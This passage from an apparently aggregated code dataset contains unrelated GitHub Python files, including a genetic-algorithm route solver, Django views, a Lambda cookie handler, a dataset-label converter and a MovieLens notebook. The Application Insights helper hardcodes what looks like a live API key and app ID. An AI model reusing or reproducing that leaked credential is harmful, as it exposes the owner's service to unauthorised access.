matrix[i][j]})\n        if matrix[i][j] == \"R\":\n            posicao_R = {\"x\": i, \"y\": j, \"name\": matrix[i][j]}\n\n# Function to compute the population's aptitude using the fitness function.\ndef aptidao(populacao):\n    lista_apitidoes = [None] * len(populacao)\n    for i, individuo in enumerate(populacao):\n        lista_apitidoes[i] = fitness(individuo)\n    maximo = sum(lista_apitidoes)\n    return [maximo - x for x in lista_apitidoes]\n\n\ndef fitness(individuo):\n    # Compute the distance between position R and the individual's first point\n    distancia_total = abs(posicao_R[\"x\"] - dict_pontos[individuo[0]][\"x\"]) + abs(\n        posicao_R[\"y\"] - dict_pontos[individuo[0]][\"y\"]\n    )\n    # For each pair of consecutive points in the individual, compute the distance between them and add it to the total distance\n    for i, ponto_atual in enumerate(individuo):\n        if i != len(individuo) - 1:\n            distancia_total += abs(\n                dict_pontos[ponto_atual][\"x\"] - dict_pontos[individuo[i + 1]][\"x\"]\n            ) + abs(dict_pontos[ponto_atual][\"y\"] - dict_pontos[individuo[i + 1]][\"y\"])\n    # Compute the distance between position R and the individual's last point, and add it to the total distance\n    distancia_total += abs(posicao_R[\"x\"] - dict_pontos[individuo[-1]][\"x\"]) + abs(\n        posicao_R[\"y\"] - dict_pontos[individuo[-1]][\"y\"]\n    )\n    # Return the computed total distance\n    return distancia_total\n\n\n# This function is responsible for selecting the fittest individuals of a population.\n# Selection is done by means of a tournament\ndef selection(populacao):\n    lista_apt = aptidao(populacao)\n    lista_pais = [None] * len(populacao)\n    for i in range(0, len(populacao), 2):\n        pai1 = torneio(lista_apt)\n        pai2 = torneio(lista_apt)\n        lista_pais[i], lista_pais[i + 1] = populacao[pai1], populacao[pai2]\n    return lista_pais\n\ndef torneio(lista_apt):\n    ind1 = random.randint(0, len(lista_apt) - 1)\n    ind2 = ind1\n    while ind1 == ind2:\n        ind2 = random.randint(0, len(lista_apt) - 1)\n    return ind1 if lista_apt[ind1] > lista_apt[ind2] else ind2\n\n# Performs genetic crossover between two individuals represented as lists, returning the
 child.\n\ndef crossover(pai1, pai2):\n    ponto_corte1 = random.randint(0, len(pai1) - 1)\n    ponto_corte2 = random.randint(0, len(pai1) - 1)\n    if ponto_corte1 > ponto_corte2:\n        ponto_corte1, ponto_corte2 = ponto_corte2, ponto_corte1\n    filho = pai1[ponto_corte1:ponto_corte2]\n    for i in pai2:\n        if i not in filho:\n            filho.append(i)\n    return filho\n\n\n# Walks through each position of the individual and, with a 1% probability, swaps that position's value with the value of another random position (j).\ndef mutation(individuo):\n    for i in range(len(individuo)):\n        if random.random() < taxa_mutacao:\n            j = random.randint(0, len(individuo) - 1)\n            individuo[i], individuo[j] = individuo[j], individuo[i]\n    return individuo\n\n\n# Create the initial population with random individuals.\ndef population(tamanho_populacao, pontos):\n    populacao = []\n    individuos_gerados = []\n    # if tamanho_populacao > math.factorial(len(pontos)): tamanho_populacao = math.factorial(len(pontos))\n    while len(populacao) < tamanho_populacao:\n        individuo = list(range(len(pontos)))\n        random.shuffle(individuo)\n        if individuo not in individuos_gerados:\n            populacao.append(individuo)\n    return populacao\n\n\n# Run the genetic algorithm using the selection, crossover and mutation functions to create a new population in each generation. \ndef algoritmo_genetico(geracoes, tamanho_populacao, pontos):\n    populacao_inicial = population(tamanho_populacao, pontos)\n    for i in range(geracoes):\n        populacao = selection(populacao_inicial)\n        nova_populacao = []\n        while len(nova_populacao) < tamanho_populacao:\n            pai1 = random.choice(populacao)\n            pai2 = random.choice(populacao)\n            filho = crossover(pai1, pai2)\n            filho = mutation(filho)\n            nova_populacao.append(filho)\n        populacao_inicial = nova_populacao\n    return populacao\n\n\n# Find the best individual, the one with the lowest fitness value\nstart = time.time()\npop = algoritmo_genetico(geracoes, tamanho_populacao, pontos)\nlista_apt = aptidao(pop)\nmelhor_individuo = pop[lista_apt.index(max(lista_apt))]\nrota = [pontos[i] for i in melhor_individuo]\ndistancia = fitness(melhor_individuo)\nend = time.time()\nprint(f\"Route:{rota} \\nDistance: {distancia}\\nExecution time: {end-start}\")\n\n\n# # Plot of the best route\n# rota_coordenada = [dict_pontos[i] for i in melhor_individuo]\n# coordenadas_melhor_rota = (\n#     [(posicao_R[\"x\"], posicao_R[\"y\"])]\n#     + [(ponto[\"x\"], ponto[\"y\"]) for ponto in rota_coordenada]\n#     + [(posicao_R[\"x\"], posicao_R[\"y\"])]\n# ) \n# fig = plt.figure()\n# plt.scatter(\n#     [x for x, y in coordenadas_melhor_rota], [y for x, y in coordenadas_melhor_rota]\n# )\n# plt.plot(\n#     [x for x, y in coordenadas_melhor_rota], [y for x, y in coordenadas_melhor_rota]\n# )\n# # Add the point labels\n# for ponto in rota_coordenada:\n#     plt.annotate(ponto[\"name\"], (ponto[\"x\"], ponto[\"y\"]))\n# plt.grid()\n# plt.show()\n\n# #Comparison plot brute force Vs GA \n# x = [4,5,7,8,10]\n# y = [0.000971, 0.009004, 0.429994, 20.49354,60]\n# y1 = [ 0.005997,0.006075,0.073047,0.079922,0.275868]\n# plt.plot(x, y, label = 'Brute-force algorithm') \n# plt.plot(x, y1, label = 'Genetic algorithm')\n# plt.xlabel('Number of delivery points') \n# plt.ylabel('Execution time in seconds') \n# plt.title('Brute Force x Genetic performance') \n# plt.legend()\n# plt.savefig('forca-brutavsgenetico.png', format='png')\n# plt.grid()\n# plt.show() 
","repo_name":"carlamarquesz/FlyFood","sub_path":"algoritimo_genetico.py","file_name":"algoritimo_genetico.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72473553127","text":"import re, sys\n\n\ndef read_words(path_to_file):\n if type(path_to_file) is not str or not path_to_file:\n return []\n\n pattern = re.compile(r'\\w+')\n words = []\n\n try:\n with open(path_to_file) as f:\n for lineno, line in enumerate(f):\n words.extend((lineno//45+1, word) for word in pattern.findall(line.lower()))\n except IOError as e:\n print(f\"I/O error({e.errno}) when opening {path_to_file}: {e.strerror}! I quit!\")\n return []\n \n return words\n\n\ndef read_target_words():\n try:\n with open('../target_words.txt') as f:\n target_words = f.read().split(',')\n except IOError as e:\n print(f\"I/O error({e.errno}) when opening ../stop_words.txt: {e.strerror}! I quit!\")\n return []\n\n target_words.sort()\n return target_words\n\n\ndef find(words, target_word):\n if type(words) is not list or not words:\n return []\n if type(target_word) is not str or not target_word:\n return []\n \n results = []\n for i, (page, word) in enumerate(words):\n if word == target_word:\n result = (page, *(words[i+j][1] for j in range(-2, 3)))\n results.append(result)\n return results\n\n\nfilename = sys.argv[1] if len(sys.argv) > 1 else '../input.txt'\nwords = read_words(filename)\ntarget_words = read_target_words()\nfor target_word in target_words:\n for result in find(words, target_word):\n print(*result[1:], '-', result[0])","repo_name":"nekoTheShadow/exercises-in-programming-style","sub_path":"ch21/q2_2.py","file_name":"q2_2.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69852436008","text":"from moviepy import *\nfrom moviepy.editor import *\nimport os\n\npath = r'E:\\YT\\MP3'\nfileformat = \"mp3\"\n\nos.chdir(path)\n\nfor file in os.listdir(path):\n file_format = \".mp3\"\n if file.endswith(\".mp4\"):\n full_path = os.path.join(path, file)\n print(full_path)\n videoclip = VideoFileClip(full_path)\n audioclip = videoclip.audio\n mp3_file = full_path[:-3]\n mp3_file = mp3_file + fileformat\n print(mp3_file)\n audioclip.write_audiofile(mp3_file)\n audioclip.close()\n videoclip.close()\n","repo_name":"MarkBanford/TipsAndTricks","sub_path":"SocialMedia/mp42mp3.py","file_name":"mp42mp3.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31384634817","text":"with open('promote.in','r') as fin:\n lines=fin.readlines()\n\npromotions=[list(map(int,line.split())) for line in lines]\n\nresult=[0,0,0]\n#iterate through each division excluding bronze\nfor i in range(1,4):\n #add number of people before and after for current division and any higher division\n for j in range(i,4):\n result[i-1]+=promotions[j][1]-promotions[j][0]\n\nwith open('promote.out','w') as fout:\n for i in result:\n fout.write(str(i)+'\\n')\n","repo_name":"RithvikKo/usaco","sub_path":"2015-16/bronze/jan/promote.py","file_name":"promote.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41342323489","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom .forms import 
*\nfrom . import models\nfrom django import forms\n\n\n# Create your views here.\n\ndef index(request):\n    faction = list(models.Faction.objects.all())\n    return render(request, 'fh/index.html', {'faction': faction})\n\n\ndef ajout(request):\n    if request.method == \"POST\": # reached when returning to this page after an invalid submission, so we retrieve the data. Normally we should not go through this path to process the data\n        form = FactionForm(request.POST, request.FILES )\n        if form.is_valid(): # validate the form.\n            faction = form.save() # save to the database\n            return HttpResponseRedirect(\"/\")\n        else:\n            return render(request, \"fh/ajout.html\", {\"form\": form})\n    else:\n        form = FactionForm() # create an empty form\n        return render(request, \"fh/ajout.html\", {\"form\": form})\n\n\ndef details(request, id):\n    faction = models.Faction.objects.get(pk=id)\n    liste = models.Hero.objects.filter(faction_id= id)\n    return render(request, \"fh/details.html\", {\"faction\": faction, \"liste\":liste})\n\n\ndef delete(request, id):\n    faction = models.Faction.objects.get(pk=id)\n    faction.delete()\n    return HttpResponseRedirect(\"/\")\n\n\ndef update(request, id):\n    faction = models.Faction.objects.get(pk = id)\n    form = FactionForm(faction.dico())\n    return render(request, \"fh/update.html\",{\"form\":form, \"id\": id})\n\ndef updatetraitement(request, id):\n\n    fform = FactionForm(request.POST, request.FILES)\n    if fform.is_valid():\n        faction = fform.save(commit = False)\n        faction.id = id\n        faction.save()\n        return HttpResponseRedirect(\"/\")\n    else:\n        return render(request, \"fh/update.html\", {\"form\": fform, \"id\" : id})\n\n\ndef index_hero(request):\n    hero = list(models.Hero.objects.all())\n    return render(request, 'fh/index_hero.html', {'hero': hero})\n\n\ndef ajout_hero(request,id):\n    if request.method == \"POST\": # reached when returning to this page after an invalid submission, so we retrieve the data.
 Normally we should not go through this path to process the data\n        form = HeroForm(request.POST, request.FILES )\n        faction = models.Faction.objects.get(pk=id)\n        if form.is_valid(): # validate the form.\n            hero = form.save(commit=False)\n            hero.faction = faction\n            hero.faction_id = id\n            hero.save()\n            return HttpResponseRedirect(\"/index_hero\")\n        else:\n            return render(request, \"fh/ajout_hero.html\", {\"form\": form, \"id\":id})\n    else:\n        form = HeroForm() # create an empty form\n        return render(request, \"fh/ajout_hero.html\", {\"form\": form, \"id\":id})\n\n\ndef details_hero(request, id):\n    hero= models.Hero.objects.get(pk=id)\n    return render(request, \"fh/details_hero.html\", {\"hero\": hero})\n\n\ndef delete_hero(request, id):\n    hero = models.Hero.objects.get(pk=id)\n    hero.delete()\n    return HttpResponseRedirect(\"/index_hero\")\n\n\ndef update_hero(request, id):\n    hero = models.Hero.objects.get(pk = id)\n    form = HeroForm(hero.dico())\n    return render(request, \"fh/update_hero.html\",{\"form\":form, \"id\": id})\n\ndef updatetraitement_hero(request, id):\n\n    fform = HeroForm(request.POST, request.FILES)\n    if fform.is_valid():\n        hero= fform.save(commit = False)\n        hero.id = id\n        hero.save()\n        return HttpResponseRedirect(\"/index_hero\")\n    else:\n        return render(request, \"fh/update_hero.html\", {\"form\": fform, \"id\" : id})","repo_name":"LordLampadaire/projet_fh","sub_path":"projet_fh_django/fh/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28805425222","text":"import json\n\ndef lambda_handler(event, context):\n    #replicates HTTP API stripping double quotes\n    input1_headers = {\n        'cookie': 'csrftoken=WvWLrENu05ETxo8ywkCOb9b8xxxxasdasdasd123242423423424; sessionid=35lg1231231dsktufyb8ulkhje0hn4uqc7m7; messages=60fd922b12313131231231231312adsasdcb$[[\\\"__json_message\\\"\\0540\\05430\\054\\\"Items must be selected in order to perform actions on them. No items have been changed.\\\"]]',\n    }\n    \n    #replicates REST API cookie payload\n    input2_headers = {\n        'cookie': 'csrftoken=WvWLrENu05ETxo8ywkCOb9b8xxxxasdasdasd123242423423424; sessionid=35lg1231231dsktufyb8ulkhje0hn4uqc7m7; messages=\"60fd922b12313131231231231312adsasdcb$[[\\\"__json_message\\\"\\0540\\05430\\054\\\"Items must be selected in order to perform actions on them. 
No items have been changed.\\\"]]\"',\n    }\n\n    #change input1_headers with input2_headers to observe cookie handling\n    cookie_components = input1_headers['cookie'].split('; ')\n    \n    messages_value = None\n    \n    for component in cookie_components:\n        key, value = component.split('=', 1)\n        if key == 'messages':\n            messages_value = value\n            break\n    \n    #----Check if 'messages' value was found\n    if messages_value:\n        #if messages_value starts and ends with double quotes, then do nothing\n        if messages_value.startswith('\"') and messages_value.endswith('\"'):\n            print('message value already starts with double quotes \"\"')\n        else:\n            #else, if messages_value does not start and end with double quotes \"\", then add them to start and end\n            messages_value = f'\"{messages_value}\"'\n            print(messages_value)\n    else:\n        print(\"No 'messages' found in the input headers.\")\n    \n    \n    return {\n        'statusCode': 200,\n        'body': json.dumps('Hello from Lambda!')\n    }\n","repo_name":"Shyam-Prag/Handling-APIGW-HTTP-API-cookies","sub_path":"handle_http_api_stripping_double_quotes.py","file_name":"handle_http_api_stripping_double_quotes.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39585463032","text":"import logging\n\nimport requests\n\nkey = \"lfxwlb5d15eda5cuy3pa4gl2p47c8re2klylm3r8\"\nappId = \"c2041544-aa9e-4919-8226-e417951e20eb\"\napi_url = f\"https://api.applicationinsights.io/v1/apps/{appId}/query\"\n\n\ndef call_api(query):\n    # query = \"traces | take 10\"\n    query_params = {\"query\": query}\n    headers = {\"x-api-key\": key}\n    response = requests.get(api_url, params=query_params, headers=headers)\n    try:\n        response.raise_for_status()\n    except requests.exceptions.HTTPError as err:\n        print(\"HTTP error occurred: \", err)\n        print(\"The query that caused the error: \", query)\n    except Exception as err:\n        print(\"Other error occurred: \", err)\n    else:\n        return response.json()\n","repo_name":"madhublock/kql_ai_generator","sub_path":"appinsights_api.py","file_name":"appinsights_api.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30421959097","text":"#######################################################################################################\r\n## Original Source: https://github.com/dacon-ai/AerialDetection/blob/master/dacon_utils/geojson2coco.py\r\n#######################################################################################################\r\n\r\nimport os\r\nimport json\r\nfrom typing import List\r\nimport math\r\nfrom glob import glob\r\n\r\nfrom tqdm import tqdm\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\nrootfolder = 'D:/Dacon/Arirang_Dataset/512_256/'\r\n\r\nimage_root = os.path.join(rootfolder, 'images')\r\ntxt_path = os.path.join(rootfolder, 'labels')\r\ndest_file = os.path.join(rootfolder, 'train.json')\r\n\r\ntask = 'train'\r\n# task = 'test'\r\ndifficult = '-1'\r\n\r\nNIA_CLASSES = ['배경', '소형 선박', '대형 선박', '민간 항공기', '군용 항공기', '소형 승용차', '버스', '트럭', '기차', '크레인', '다리',\r\n               '정유탱크', '댐', '운동경기장', '헬리패드', '원형 교차로']\r\nCLASS_NAMES_EN = ('background', 'small_ship', 'large_ship', 'civilian_aircraft', 'military_aircraft', 'small_car',\r\n                  'bus', 'truck', 'train', 'crane', 'bridge', 'oil_tank', 'dam', 'athletic_field', 'helipad',\r\n                  'roundabout')\r\nCLASS_DICT = {'background':0, 'small_ship':1, 'large_ship':2, 'civilian_aircraft':3, 'military_aircraft':4, 
'small_car':5,\r\n 'bus':6, 'truck':7, 'train':8, 'crane':9, 'bridge':10, 'oil_tank':11, 'dam':12, 'athletic_field':13,\r\n 'helipad':14, 'roundabout':15}\r\n\r\n# dota to coco\r\nif task == 'train':\r\n data_dict = {}\r\n data_dict['images'] = []\r\n data_dict['categories'] = []\r\n data_dict['annotations'] = []\r\n for idex, name in enumerate(CLASS_NAMES_EN[1:]):\r\n single_cat = {'id': idex + 1, 'name': name, 'supercategory': name}\r\n data_dict['categories'].append(single_cat)\r\n\r\n with open(dest_file, 'w') as f_out:\r\n txts = os.listdir(txt_path)\r\n obj_coords = list()\r\n image_ids = list()\r\n class_indices = list()\r\n class_names = list()\r\n for txt in tqdm(txts, desc='loading txt files'):\r\n with open(os.path.join(txt_path, txt)) as f:\r\n labels = f.readlines()\r\n for label in labels:\r\n label = label.split(' ')\r\n if label[8] != 'etc':\r\n obj_coords.append(label[0:8])\r\n image_ids.append(os.path.join(txt_path, txt).replace('.txt', '.png').split(os.path.sep)[-1])\r\n class_indices.append(CLASS_DICT[label[8]])\r\n class_names.append(label[8])\r\n\r\n img_id_map = {img_file: i + 1 for i, img_file in enumerate(list(set(image_ids)))}\r\n image_ids = [img_id_map[img_file] for img_file in image_ids]\r\n\r\n # convert_labels_to_objects(coords, class_ids, class_names, image_ids, difficult=0, is_clockwise=False):\r\n objs = list()\r\n inst_count = 1\r\n\r\n for coords, cls_id, cls_name, img_id in tqdm(zip(obj_coords, class_indices, class_names, image_ids),\r\n desc=\"converting labels to objects\"):\r\n for i in range(len(coords)):\r\n coords[i] = float(coords[i])\r\n\r\n x_coords = coords[0::2]\r\n y_coords = coords[1::2]\r\n\r\n xmin = min(x_coords)\r\n ymin = min(y_coords)\r\n\r\n xmax = max(x_coords)\r\n ymax = max(y_coords)\r\n\r\n w = xmax - xmin\r\n h = ymax - ymin\r\n\r\n single_obj = {}\r\n single_obj['difficult'] = difficult\r\n single_obj['area'] = w * h\r\n\r\n if cls_name in CLASS_NAMES_EN:\r\n single_obj['category_id'] = CLASS_DICT[cls_name]\r\n else:\r\n continue\r\n\r\n single_obj['segmentation'] = [[int(p) for p in coords]]\r\n single_obj['iscrowd'] = 0\r\n single_obj['bbox'] = (xmin, ymin, w, h)\r\n single_obj['image_id'] = img_id\r\n single_obj['id'] = inst_count\r\n inst_count += 1\r\n objs.append(single_obj)\r\n\r\n data_dict['annotations'].extend(objs)\r\n\r\n for imgfile in tqdm(img_id_map, desc='saving img info'):\r\n imagepath = os.path.join(image_root, imgfile)\r\n img_id = img_id_map[imgfile]\r\n img = cv2.imread(imagepath)\r\n height, width, c = img.shape\r\n single_image = {}\r\n single_image['file_name'] = imgfile\r\n single_image['id'] = img_id\r\n single_image['width'] = width\r\n single_image['height'] = height\r\n data_dict['images'].append(single_image)\r\n\r\n json.dump(data_dict, f_out)\r\n\r\nelif task == 'test':\r\n data_dict = {}\r\n data_dict['images'] = []\r\n data_dict['categories'] = []\r\n for idex, name in enumerate(CLASS_NAMES_EN[1:]):\r\n single_cat = {'id': idex + 1, 'name': name, 'supercategory': name}\r\n data_dict['categories'].append(single_cat)\r\n\r\n with open(dest_file, 'w') as f_out:\r\n image_ids = os.listdir(image_root)\r\n img_id_map = {img_file: i + 1 for i, img_file in enumerate(list(set(image_ids)))}\r\n image_ids = [img_id_map[img_file] for img_file in image_ids]\r\n\r\n for imgfile in tqdm(img_id_map, desc='saving img info'):\r\n imagepath = os.path.join(image_root, imgfile)\r\n img_id = img_id_map[imgfile]\r\n img = cv2.imread(imagepath)\r\n height, width, c = img.shape\r\n single_image = {}\r\n 
single_image['file_name'] = imgfile\r\n            single_image['id'] = img_id\r\n            single_image['width'] = width\r\n            single_image['height'] = height\r\n            data_dict['images'].append(single_image)\r\n\r\n        json.dump(data_dict, f_out)\r\n","repo_name":"JunHyungKang/Detection_utils","sub_path":"dota_to_coco.py","file_name":"dota_to_coco.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"489282732","text":"# -*- coding: utf-8 -*-\n# author: Tac\n# contact: cookiezhx@163.com\n\nAPP_NAME = \"QtQuickPythonTemplate\"\nAPP_VERSION = \"1.0.0\"\nAPP_ICON = \":/resource/icon.jpg\"\nORGANIZATION_NAME = \"Unknown\"\n\nRESOURCE_PREFIX = \"resource\"\nVIEW_PREFIX = \"view\"\nSHADER_PREFIX = \"shader\"\n","repo_name":"Tac213/QtQuickPythonTemplate","sub_path":"src/qt_quick_python_template/const/app_const.py","file_name":"app_const.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"23022140365","text":"import os\nfrom typing import List\n\nimport hydra\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import LightningDataModule, LightningModule, Trainer, seed_everything\nfrom pytorch_lightning.loggers import LightningLoggerBase\nimport torch\nimport pandas as pd\nfrom src import utils\n\nfrom rich.console import Console\nfrom rich.table import Table\n\nlog = utils.get_logger(__name__)\n\n\ndef test(config: DictConfig) -> None:\n    \"\"\"Contains minimal example of the testing pipeline. Evaluates given checkpoint on a testset.\n\n    Args:\n        config (DictConfig): Configuration composed by Hydra.\n\n    Returns:\n        None\n    \"\"\"\n\n    # Set seed for random number generators in pytorch, numpy and python.random\n    if config.get(\"seed\"):\n        seed_everything(config.seed, workers=True)\n\n    # Convert relative ckpt path to absolute path if necessary\n    if not os.path.isabs(config.ckpt_path):\n        config.ckpt_path = os.path.join(hydra.utils.get_original_cwd(), config.ckpt_path)\n\n    # Init lightning datamodule\n    log.info(f\"Instantiating datamodule <{config.datamodule._target_}>\")\n    datamodule: LightningDataModule = hydra.utils.instantiate(config.datamodule, config.data_dir)\n    datamodule.setup(\"test\")\n\n    # get the number of labels\n    num_labels = len(datamodule.data_test.unique_labels)\n\n    # Init lightning model\n    log.info(f\"Instantiating model <{config.model._target_}>\")\n    model: LightningModule = hydra.utils.instantiate(\n        config.model,\n        num_labels=num_labels,\n        metrics=config.metrics,\n        _recursive_=False,  # for hydra (won't recursively instantiate criterion)\n    )\n\n    # Init lightning loggers\n    logger: List[LightningLoggerBase] = []\n    if \"logger\" in config:\n        for _, lg_conf in config.logger.items():\n            if \"_target_\" in lg_conf:\n                log.info(f\"Instantiating logger <{lg_conf._target_}>\")\n                logger.append(hydra.utils.instantiate(lg_conf))\n\n    # Init lightning trainer\n    log.info(f\"Instantiating trainer <{config.trainer._target_}>\")\n    trainer: Trainer = hydra.utils.instantiate(config.trainer, logger=logger)\n\n    # Log hyperparameters\n    if trainer.logger:\n        trainer.logger.log_hyperparams({\"ckpt_path\": config.ckpt_path})\n\n    log.info(\"Starting testing!\")\n    trainer.test(model=model, datamodule=datamodule, ckpt_path=config.ckpt_path)\n    model.test_results\n\n    # Let's do some analysis on the test results\n\n    def convert_to_tokens(inputs: List, tokenizer: torch.nn.DataParallel) -> List:\n        return tokenizer.convert_ids_to_tokens(inputs)\n\n    def convert_to_labels(label: List, label_map: dict) -> List:\n        return [label_map[l] if l in label_map else None for l in label]\n\n\n    def contract_labels(inputs: List, labels: List, predictions: List):\n        # check that all three lists have the same length:\n        assert len(inputs) == len(labels) == len(predictions) \n        new_inputs = []\n        new_labels = []\n        new_predictions = []\n        for input, label, prediction in zip(inputs, labels, predictions):\n            if label is None:\n                continue\n            if input.startswith(\"##\"):\n                new_inputs[-1] += input[2:]\n            else:\n                new_inputs.append(input)\n                new_labels.append(label)\n                new_predictions.append(prediction)\n        return new_inputs, new_labels, new_predictions\n\n    model.test_results['inputs'] = model.test_results.input_ids.apply(\n        lambda x: convert_to_tokens(x[0], datamodule.data_test.tokenizer)\n    )\n\n    model.test_results['label'] = model.test_results.label.apply(\n        lambda x: convert_to_labels(x[0], datamodule.data_test.ids_to_labels)\n    )\n\n    model.test_results['predictions'] = model.test_results.predictions.apply(\n        lambda x: convert_to_labels(x[0], datamodule.data_test.ids_to_labels)\n    )\n\n    temp = model.test_results.apply(lambda row: contract_labels(row.inputs, row.label, row.predictions), axis=1)\n\n    model.test_results = pd.DataFrame(temp.tolist(), columns=['inputs', 'label', 'predictions'])\n\n    def colorize(inputs: List, labels: List, predictions: List) -> List:\n        \"\"\"Colorize the input based on the results of the prediction.\"\"\"\n        assert len(inputs) == len(labels) == len(predictions) \n        color_inputs = []\n        for input, label, prediction in zip(inputs, labels, predictions):\n            if label == prediction:\n                if label in [\"B-per\", \"I-per\"]:\n                    color_inputs.append(f\"[bold green]{input}[/bold green]\")\n                else:\n                    color_inputs.append(input)\n            else:\n                if label in [\"B-per\", \"I-per\"]:\n                    color_inputs.append(f\"[bold red]{input}[/bold red]\")\n                else:\n                    color_inputs.append(f\"[red]{input}[/red]\")\n        return color_inputs\n\n    # create colored inputs based on the results of the prediction\n    model.test_results['color_inputs'] = model.test_results.apply(lambda row: colorize(row.inputs, row.label, row.predictions), axis=1)\n    model.test_results['color_inputs'] = model.test_results['color_inputs'].apply(lambda x: ' '.join(x))\n\n    # count the number of errors in each sentence and colorize the results\n    model.test_results['errors'] = model.test_results.apply(lambda row: sum([label != prediction for label, prediction in zip(row.label, row.predictions)]), axis=1)\n    model.test_results['errors'] = model.test_results['errors'].apply(lambda x: f\"[green]0[/green]\" if x == 0 else f\"[red]{x}[/red]\")\n\n    # Create a table to make visual inspection of the results easier\n    table = Table(title=\"Test data results\")\n    table.add_column(\"Index\", style=\"cyan\", no_wrap=True)\n    table.add_column(\"Results\", justify=\"left\", no_wrap=True)\n    table.add_column(\"# of Errors\", justify=\"center\")\n\n    model.test_results.apply(lambda row: table.add_row(str(row.name), row.color_inputs, str(row.errors)), axis=1)\n    console = Console()\n    console.print(table)\n\n    print('Done!')\n","repo_name":"natephysics/event_lineup_extraction","sub_path":"src/testing_pipeline.py","file_name":"testing_pipeline.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2576015326","text":"import math\ndef dist(tuple1, tuple2, currdist=0):\n    ans = round(currdist + 
math.sqrt(abs((tuple1[0] - tuple2[0])**2 + (tuple1[1] - tuple2[1])**2)), 4)\n    print(ans)\n    return ans\n    \nbiglist = [(3.9,0),(4.1,0),(4.25,1),(3.75,1),(3.5,2),(4.5,2),(4.75,3),(3.25,3), (3,4), (5,4), (5.25, 5), (2.75,5), (2.5, 6), (5.5, 6)]\n\ncurrdist = 0\nfor i, currtup in enumerate(biglist):\n    if i + 1 == len(biglist):\n        break\n    currdist = dist(currtup, biglist[i+1], currdist)","repo_name":"malcolmang/simple-lattice-gcode","sub_path":"New folder/extruderlength.py","file_name":"extruderlength.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29588575624","text":"import random\nimport probabilityHash as p\ndef simInsertions(numIndices, numInsertions):\n    \"\"\"Assumes numIndices and numInsertions are positive ints\n    Returns 1 if there is a collision \"\"\"\n    print('entering simInsertions')\n    choices = range(numIndices)#list of possible indices\n    used = []\n    for i in range(numInsertions):\n        print(used)\n        hashVal = random.choice(choices)\n        if hashVal in used:\n            return 1\n        else:\n            used.append(hashVal)\n    return 0\n\ndef finProb(numIndices, numInsertions,numTrials):\n    collision=0\n    for t in range(numTrials):\n        collision+=simInsertions(numIndices,numInsertions)\n    return collision/numTrials\n\n#model\nprint('Actual probability of a collision ',p.collisionProb(1000,50))\n#empirical\nprint('Estimate probability of a collision ',finProb(1000,50,10000))\n#model\nprint('Actual probability of a collision ',p.collisionProb(1000,200))\n#empirical\nprint('Estimate probability of a collision ',finProb(1000,200,10000))\n\"\"\"Does that mean the hash table has to be enormous to be useful?\nThis probability tells us little about the expected lookup time. The expected lookup time\ndepends upon the average length of the lists implementing the buckets.\nAssuming a uniform distribution, this is the number of insertions/number of buckets.\"\"\"\n","repo_name":"stevenAnto/mitPythonIntro","sub_path":"IntroComputSciencProPy/statistic/simulatingHashTables.py","file_name":"simulatingHashTables.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30777434567","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\n\n# In[2]:\n\n\n#MovieLens movie ratings data\n\n\n# In[3]:\n\n\npd.options.display.max_rows = 10\nunames = ['user_id', 'gender', 'age', 'occupation', 'zip']\nusers = pd.read_table('datasets/movielens/users.dat', sep='::',\n                      header=None, names=unames)\nrnames = ['user_id', 'movie_id', 'rating', 'timestamp']\nratings = pd.read_table('datasets/movielens/ratings.dat', sep='::',\n                        header=None, names=rnames)\nmnames = ['movie_id', 'title', 'genres']\nmovies = pd.read_table('datasets/movielens/movies.dat', sep='::',\n                       header=None, names=mnames)\n\n\n# In[7]:\n\n\nusers[:5]\n\n\n# In[5]:\n\n\nratings[:5]\n\n\n# In[6]:\n\n\nmovies[:5]\n\n\n# In[8]:\n\n\nratings\n\n\n# In[9]:\n\n\ndata = pd.merge(pd.merge(ratings, users), movies)\n\n\n# In[10]:\n\n\ndata\n\n\n# In[11]:\n\n\ndata.iloc[0]\n\n\n# In[12]:\n\n\nmean_ratings = data.pivot_table('rating', index='title',\n                                columns='gender', aggfunc='mean')\n\n\n# In[13]:\n\n\nmean_ratings[:5]\n\n\n# In[14]:\n\n\nratings_by_title = data.groupby('title').size()\n\n\n# In[15]:\n\n\nratings_by_title[:10]\n\n\n# In[16]:\n\n\nactive_titles = ratings_by_title.index[ratings_by_title >= 250]\n\n\n# In[17]:\n\n\nactive_titles\n\n\n# In[18]:\n\n\nmean_ratings = mean_ratings.loc[active_titles]\n\n\n# In[19]:\n\n\nmean_ratings\n\n\n# In[20]:\n\n\ntop_female_ratings = 